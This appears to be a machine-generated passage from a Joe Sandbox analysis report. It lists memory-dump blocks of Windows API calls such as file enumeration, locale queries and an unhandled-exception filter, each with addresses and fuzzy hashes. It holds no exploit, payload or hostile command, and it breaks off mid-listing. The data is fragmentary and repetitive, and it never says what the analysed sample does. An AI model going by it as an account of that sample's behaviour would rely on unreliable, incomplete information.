                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                                                              • Opcode ID: c24445b840ad473e93455800244e76dfe08a8421ac4b00f14777518c8abe7178
                                                                                                                                                                                                                                                              • Instruction ID: 6bd9beb9d0a7f9cb8dbc33e6c4269830d4342d7ed9733e0bd4e0b608aee51131
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c24445b840ad473e93455800244e76dfe08a8421ac4b00f14777518c8abe7178
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC31C574911229DBCB21DF28ED8979DBBB8BF08310F5041EAE41CA7261E7749F958F44
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DF807: HeapAlloc.KERNEL32(00000008,?,002D31E1,?,002DE921,00000001,00000364,002D31E1,00000003,000000FF,?,002D60C1,002D186C,002D186A,?,?), ref: 002DF848
                                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002E384A
                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 002E393E
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 002E397D
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 002E39B0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2701053895-0
                                                                                                                                                                                                                                                              • Opcode ID: 9ea122d5fbb43f73a0d76af45503eeb2a6d985a44256d68e2b0c2a4f35f3a48d
                                                                                                                                                                                                                                                              • Instruction ID: 5becf3dfdcb717a8608162956347a74c8b4180c382b8d6f64a1ea571e0ac9733
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ea122d5fbb43f73a0d76af45503eeb2a6d985a44256d68e2b0c2a4f35f3a48d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6517AB5960199AFDF10DF3A8C8C9BEB7ADDF85314F90419AF80997201EA309E518F24
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002E3005
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                                              • Opcode ID: d79b7fa1d0f787c5d504198e62fcc006843232a095fbae6f3b2db5e7e4949478
                                                                                                                                                                                                                                                              • Instruction ID: 14b3c12793510a279efd1764984bd94654b728d3b6d85c86b5435a3b7a0546df
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d79b7fa1d0f787c5d504198e62fcc006843232a095fbae6f3b2db5e7e4949478
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B21B372561257ABEF28EF1ADC45ABB73A8EF44311B50007AFD01D7245EB74DE20CA50
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002E3125
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                                              • Opcode ID: 08f7636b4b813a425a5592783681bb2987a76413417f6a845751b3d17c4348dc
                                                                                                                                                                                                                                                              • Instruction ID: 2dac62a75503f2fac308e5bbc0639b35e4220dad499656727f6623cdf830961c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08f7636b4b813a425a5592783681bb2987a76413417f6a845751b3d17c4348dc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6110632561217ABDB14EF29DC4AABAB7E8EF05311B50017AF605DB240EB74EE108B90
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(002E2CFF,00000001,00000000,?,-00000050,?,002E2AEF,00000000,-00000002,00000000,?,00000055,?), ref: 002E2CD6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: 656e34e43908dc468523f24d32ba7b2ef6bc7d66f1c7206b384df741d227d158
                                                                                                                                                                                                                                                              • Instruction ID: 634d43b617b53aa0a696bdf8c7d5d2d46a3f70e51dc463a26285ccfc36fe7f44
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 656e34e43908dc468523f24d32ba7b2ef6bc7d66f1c7206b384df741d227d158
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB11293B2103029FDB18AF3AC8916BAB796FF80368B59442DE94747B40D371A956CB40
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002E2F1B,00000000,00000000,?), ref: 002E32AA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                                              • Opcode ID: 9c68419c7f9845c1dc064e9647f7d80783d6d8279b78e4c4d8da651d0229343f
                                                                                                                                                                                                                                                              • Instruction ID: 034483c6b418b1a7a0c3f26058a812b85db0968d9ec3916086c1a8b140b90f78
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c68419c7f9845c1dc064e9647f7d80783d6d8279b78e4c4d8da651d0229343f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A017632660113BBDB18DA23CC0EBBA37A4DB00725F450429ED92A3180EA71EF20CA94
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(002E2FB1,00000001,?,?,-00000050,?,002E2AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 002E2F9C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: 5dbc75c62869030ddc4d25132798baef7d8fa3a8d0de413e92510d139dcff61c
                                                                                                                                                                                                                                                              • Instruction ID: 4cffc11c464996fa1de99f4bd577b281410268ee91d91da72116a946ee21e13b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dbc75c62869030ddc4d25132798baef7d8fa3a8d0de413e92510d139dcff61c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAF046362103459FDB14AF3A9885A7ABBA5EF80368B45842CF9064BB80C7B19C02CA80
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DB750: EnterCriticalSection.KERNEL32(-00023A67,?,002D8F5A,00000000,002F44D8,0000000C,002D8F13,?,?,002DF83A,?,?,002DE921,00000001,00000364,002D31E1), ref: 002DB75F
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(002DF70A,00000001,002F4928,0000000C,002DF118,-00000050), ref: 002DF74F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                                              • Opcode ID: ec7c7767c4834dca1a749fd5780c64903fbaa28335aaaf5cbcfdd8a156f8080e
                                                                                                                                                                                                                                                              • Instruction ID: f0b6e1549d33e22c6bca0c19afcf912d12d58caaa613e22a486096ff437fabab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec7c7767c4834dca1a749fd5780c64903fbaa28335aaaf5cbcfdd8a156f8080e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF03C76A10204DFE700EF58E846BADB7F0EB44761F10412AF415DB390C7B59910CF84
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: GetLastError.KERNEL32(00000000,?,002E0AB9), ref: 002DE787
                                                                                                                                                                                                                                                                • Part of subcall function 002DE783: SetLastError.KERNEL32(00000000,?,?,00000028,002DB9D2), ref: 002DE829
                                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(002E30D1,00000001,?,?,?,002E2B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 002E30BD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                                              • Opcode ID: b3f963a09559cc5b2ada7445f71f7504a4ef70e10962ee845290b93782390202
                                                                                                                                                                                                                                                              • Instruction ID: fbc579bf74ef1e92757f16b46c902042064c56aee4716e65990efabd03fa1cc1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3f963a09559cc5b2ada7445f71f7504a4ef70e10962ee845290b93782390202
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02F0E53A74024A57CB04EF3AD84967ABF94EFC2761B464059EA058B351C6B29A92C790
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,002DA4BC,?,20001004,00000000,00000002,?,?,002D93CE), ref: 002DF250
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                                              • Opcode ID: 71b47339e7761a7e7717b73b4527f4f6c4a92592977b9263d7ffc25814c927a8
                                                                                                                                                                                                                                                              • Instruction ID: 3623dadaba8540b9cd5e5aa86ab766ea91be6a2197d8f88bb5b22bd2a6d87954
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71b47339e7761a7e7717b73b4527f4f6c4a92592977b9263d7ffc25814c927a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE04F36510118BBCF527F60ED09AAE7F19EF447A0F004432FD1665361CBB19D30AAD9
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00005135), ref: 002D5019
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                                              • Opcode ID: b59c313faa474e2fe88eac7521ac7a25776448ccc12b2e8f7fb7009b14580272
                                                                                                                                                                                                                                                              • Instruction ID: 0754aceb9a386a606e9d972ab623dc7e02687023259bf4f3a8dae668bad03941
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b59c313faa474e2fe88eac7521ac7a25776448ccc12b2e8f7fb7009b14580272
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000009.00000002.2559132722.00000000002D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559086223.00000000002D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559168659.00000000002EC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559198282.00000000002F5000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559254684.00000000002F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559284793.00000000002F8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559308620.00000000002FA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000009.00000002.2559330510.00000000002FD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2d0000_85746525a0.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                                              • Opcode ID: 48fa9560d8b5d0830407472a462a64981584b31cdc87875f9d982c8b7bb5f639
                                                                                                                                                                                                                                                              • Instruction ID: cb76ce3b2479780376b6f20644d9f4dcb2d855100312096855384a2c464a1751
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48fa9560d8b5d0830407472a462a64981584b31cdc87875f9d982c8b7bb5f639
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA01130A02202CB8300CF32BA0CA283AA8AA002E03088038A00AC0020EBA08080EF00
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(0093FE78,0093FE78,00000000,7FFFFFFF,?,002EA20D,0093FE78,0093FE78,00000000,0093FE78,?,?,?,?,0093FE78,00000000), ref: 002EA2C8
                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 002EA383
